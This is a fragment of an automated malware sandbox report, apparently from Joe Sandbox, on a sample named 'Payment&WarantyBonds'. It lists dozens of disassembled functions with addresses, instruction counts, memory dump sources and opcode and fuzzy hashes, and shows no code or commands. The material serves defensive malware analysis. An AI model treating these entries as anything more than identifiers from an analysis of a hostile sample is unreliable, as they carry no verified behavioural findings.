                                                                                                                                                                                • Opcode Fuzzy Hash: 65c7f3ba2b3816035b083109f0dd46306bb108031799ef648eb5b4486455e901
                                                                                                                                                                                • Instruction Fuzzy Hash: 4451D6B16142419FE731EF65C881F6B7BA8EBA5724F10062EF921972B1D730D845CBA2
                                                                                                                                                                                Function 0149D5D0 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                • Instruction ID: 747404f10d047cc43f25dc77630817cb98fb92ea1c935f1d34fed9833ed99c52
                                                                                                                                                                                • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                • Instruction Fuzzy Hash: A951DB76A003439BDF119FA98C4097F7FA5EFA8644F04046BFA48C7271E634D856C7A2
                                                                                                                                                                                Function 014495DA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: def91eef14799fcf35fc1cfa40e07b03e5ae2fd67696267b75e34e5b001ed76d
                                                                                                                                                                                • Instruction ID: 602054cc692de91c8b3da73d5a586fedb8bbd51e31b615823aebcbd27e1f9a80
                                                                                                                                                                                • Opcode Fuzzy Hash: def91eef14799fcf35fc1cfa40e07b03e5ae2fd67696267b75e34e5b001ed76d
                                                                                                                                                                                • Instruction Fuzzy Hash: FE518371D01209AFEB21AFA5CC41BAEBBB8FF15304F20412FE554A71A1D7719945EF11
                                                                                                                                                                                Function 01427152 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: daff921d29d69d87ff9f93a6b69501835253c7237be1eabf19c49b757cdb33ba
                                                                                                                                                                                • Instruction ID: 1e0ba9d5663db96b6273577a68afd4412988b19740e2569104bf1984d3af3da4
                                                                                                                                                                                • Opcode Fuzzy Hash: daff921d29d69d87ff9f93a6b69501835253c7237be1eabf19c49b757cdb33ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D51D230A00616AFEB16EB68C844B7EBBB5BF64716F20416FD512973B0DB749942CB90
                                                                                                                                                                                Function 0145E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                                                                                                                                • Instruction ID: 76ef97e18d045e44853e82df7094603ccd9924cf7af82bb3dfd70f1e524627eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A516C71200A05EFDB22DFAAC980E6AB7B9FF68754F40046FE95197271D734EA41CB50
                                                                                                                                                                                Function 014445B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction ID: 05893762fbaea78ffd5f1d6250403e44634b9e0fb72fef99ba42ab7f607c385e
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction Fuzzy Hash: E0518D71E0021AABEF15DF98C440BEEBBB5AF45354F08406AEA05AB360D734DD45CBA0
                                                                                                                                                                                Function 014ED26B Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                • Instruction ID: 17f3d2ff503da454093ef7488353e86c1192d52c60762decc516b20db2dcd286
                                                                                                                                                                                • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                • Instruction Fuzzy Hash: 36517D71A083429FD710CF68C884B5BBBE5FBD8255F04892EF99597391D734E806CB52
                                                                                                                                                                                Function 014251ED Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a89448e97ed505c755ee2889bce9a938eb65d36a867735c8e9baa63ccaa4de22
                                                                                                                                                                                • Instruction ID: ac26322f4f442f582bb6f264da5b4ff94ff4a75dba75d3539d329d3c4024a351
                                                                                                                                                                                • Opcode Fuzzy Hash: a89448e97ed505c755ee2889bce9a938eb65d36a867735c8e9baa63ccaa4de22
                                                                                                                                                                                • Instruction Fuzzy Hash: 47518171A01225DBEF22EBA9C840BEEB7B4BB14714F54101BE811EB3A1D7B49881CB64
                                                                                                                                                                                Function 014F35D7 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                • Instruction ID: 1cb8b8ec4113a3bd5e182d4bb8ef48371a449b661129dbeabc920c3b2a13ab0b
                                                                                                                                                                                • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                • Instruction Fuzzy Hash: DF514A71600606EFDB16CF19C580A56BBB5FF55308F15C0AAEA089F322E371E986CB90
                                                                                                                                                                                Function 014501F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0159190ec8a45406742aa3e85bff289296c2a3c87b603bfc81154c0cf1df1337
                                                                                                                                                                                • Instruction ID: 086b0ae4ffc141b95b57df6c137c8df185ce2ffff8368d4bd65eaed8611f7a4c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0159190ec8a45406742aa3e85bff289296c2a3c87b603bfc81154c0cf1df1337
                                                                                                                                                                                • Instruction Fuzzy Hash: 9041A93A9002199BDB50DF99C440AEEBBB4AF58710F14826BFD15A7362D7349D42CBA4
                                                                                                                                                                                Function 0142D534 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 284838ea4c569e3f89e6113d58d2c78b47be75b46a579f13dfdaedb1a1ffca89
                                                                                                                                                                                • Instruction ID: c19ce3012f45a11024e603abb432afe58c6d8e2dc432367fcd52b928a797bbd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 284838ea4c569e3f89e6113d58d2c78b47be75b46a579f13dfdaedb1a1ffca89
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A51DD32A006A1CFD722EF5CC454B2E77A5BB44B54F4900AAFA41CB7B1DB78DC80C6A1
                                                                                                                                                                                Function 0149D1C0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                                                                                • Instruction ID: dbebbb1068271c11e76c0b20b3ecae4a0f040cb518edc99b58f47f646e7e1951
                                                                                                                                                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                                                                                • Instruction Fuzzy Hash: F3510671E04206DFDF18CFA8C5816AABBF1FB48314B1485AED919A7345E734EA81CB90
                                                                                                                                                                                Function 01426154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
                                                                                                                                                                                • Instruction ID: 9341e5536894cbcc3bd3cac4ced69abc9dddc1ec8155343d6980511ca709c908
                                                                                                                                                                                • Opcode Fuzzy Hash: 347dc5a723645e59dedc5e75ba355522297e0888c290f7f06f5f18bbc7ebfe9b
                                                                                                                                                                                • Instruction Fuzzy Hash: 65510870900226DBEB26AF28CC40BA9B7B1FF25314F1542ABD925973E1DB7499C1CF90
                                                                                                                                                                                Function 0141B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8dc7fe6a585f0fa754468c5741bdb60c5e000377ff3da54d455b522b5f6d1d95
                                                                                                                                                                                • Instruction ID: 42b2d6ea39c6a48ee6200e5baa0d404f1d6f1cd6ab99f70839219fb9caef8424
                                                                                                                                                                                • Opcode Fuzzy Hash: 8dc7fe6a585f0fa754468c5741bdb60c5e000377ff3da54d455b522b5f6d1d95
                                                                                                                                                                                • Instruction Fuzzy Hash: 1441B071640302EFD722AF6AC884B9ABBF8EF64794F01446BE5119B275D770D805CB50
                                                                                                                                                                                Function 0144A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
                                                                                                                                                                                • Instruction ID: 34b13fd6c932e1694df70cc4660bb79eea68bbb90486d61a94d7123506e0df49
                                                                                                                                                                                • Opcode Fuzzy Hash: cfa6bbe05b0a229848395c8ad8c02851ec4b61662f68493760ed8cf14bdab30f
                                                                                                                                                                                • Instruction Fuzzy Hash: BA41C432980205CFEB21DF68C554BEE7BB0FB58314F25016BD422BB3A5DB349945DB94
                                                                                                                                                                                Function 0141A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                • Instruction ID: e562bb11a6bd45a022f82027be34d5e35d0bbd89a940423d806f367516dac3bb
                                                                                                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A418A71A01251DBDB21DE2D84607FBBFB1EBA0B54F25806BE945CB368D6338D80CB90
                                                                                                                                                                                Function 014A05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
                                                                                                                                                                                • Instruction ID: 3e2e7fb62ff6d902dbbb3bb8f1b9d2bc73e0a953415e30d11836f59a2c74399d
                                                                                                                                                                                • Opcode Fuzzy Hash: 91e35fa663782f019ba40f92606369a40d9779fdb5c262164b066f17404a9db6
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41D3725086419FC320DF29D840A6BB7E9BFE8704F55061EF998877A0E730D914C7A6
                                                                                                                                                                                Function 014302E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction ID: 316951b7ff04eca8ad4d092e92b888a046490d5d002a3add25d50c0aa9314cb6
                                                                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction Fuzzy Hash: F8312731A04245AFDB229B69CC40B9FBFE8AF68750F04426BF455D7362C7B49885CBA0
                                                                                                                                                                                Function 01449274 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1976e8ecadf06403c3327f23af66724acaeb648796d015f26b1f74026d7aa733
                                                                                                                                                                                • Instruction ID: 7c47799130fc1b9681960e2a164961f89e06780e552d2c55bb95e389f1136764
                                                                                                                                                                                • Opcode Fuzzy Hash: 1976e8ecadf06403c3327f23af66724acaeb648796d015f26b1f74026d7aa733
                                                                                                                                                                                • Instruction Fuzzy Hash: D4319671A00629AFEB319B28CC40B9BB7B5AF8E314F0101DAE54CA7390DB309D45DF51
                                                                                                                                                                                Function 01424260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                                                                                                                                • Instruction ID: 55d75c56a7e4bf17941e9e931028b2ebe03b77ac47487b53b9a0b58db7aa1059
                                                                                                                                                                                • Opcode Fuzzy Hash: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                                                                                                                                • Instruction Fuzzy Hash: FF418F31200B45DFD722DF29C491BDB7BE9EB59754F05482EE6598B360C7B4E848CB50
                                                                                                                                                                                Function 014450E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                • Instruction ID: 98ca41f77008bf9761068b2db46a08e9e3704886594eb49b53f580da74f83902
                                                                                                                                                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                • Instruction Fuzzy Hash: B131D431A082429FFB21DA1DC80076BBA95AB95750F08852BF5958F3A5D674CC41C7A2
                                                                                                                                                                                Function 014E61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                                                                                                                                • Instruction ID: 8cd5b87866c9209ed65100fda55924b30637419205c691163284cb58b854a6b9
                                                                                                                                                                                • Opcode Fuzzy Hash: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3531E475A00116EBDB15EF98CC44BAEB7F9FB58741F46416AE900AB254D770ED00CBA0
                                                                                                                                                                                Function 014E60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                                                                                                                                • Instruction ID: 298b2db2cdbbbedcd9605969304d67d67575be1657e349c3d42f53af7894b108
                                                                                                                                                                                • Opcode Fuzzy Hash: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                                                                                                                                • Instruction Fuzzy Hash: A831F671640212EBDB13DF9AC854B6FB7F9AFA4315F02006EE505DB362DA70DD018790
                                                                                                                                                                                Function 01428550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
                                                                                                                                                                                • Instruction ID: 3e2ddbb070d55e4f42564a58bd1c4c374a949374b2ce950afcd2c8a2d0a5d44f
                                                                                                                                                                                • Opcode Fuzzy Hash: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A3181B26053128FE721DF19C840B1BBBE5FB98700F45496EEA8497761D7B0E885CB91
                                                                                                                                                                                Function 01477190 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                • Instruction ID: d50662962070d4892b27833383b38911a7d2951938a953f88996e3dc471e1c02
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                • Instruction Fuzzy Hash: 87316975605206CFC710CF1CC484996BBF6FF89314B6585AAEA589B325E730ED06CB91
                                                                                                                                                                                Function 0144438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
                                                                                                                                                                                • Instruction ID: a8d1edf2703930743d42f97ee739f3a9716d562f46eaf70fb3ba2ffa1aa1ef1d
                                                                                                                                                                                • Opcode Fuzzy Hash: fffdca62f76573740a371e793a368fd2e0a219efb8c18cd00395b0f66c7de350
                                                                                                                                                                                • Instruction Fuzzy Hash: 8231F432B002059FE720EFA9C981B6EBBF9EB94304F04843BD515D7260D730D946CB91
                                                                                                                                                                                Function 014292C5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                                                • Instruction ID: e282b608da05b32f6f8a4fd7205d9bfba2a704506f91769b6458630291e0dc26
                                                                                                                                                                                • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1031A9B160821A9FCB01DF19D84095ABBE9FFA9314F00056AFC45D73A0D630DC41CBA6
                                                                                                                                                                                Function 0141C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
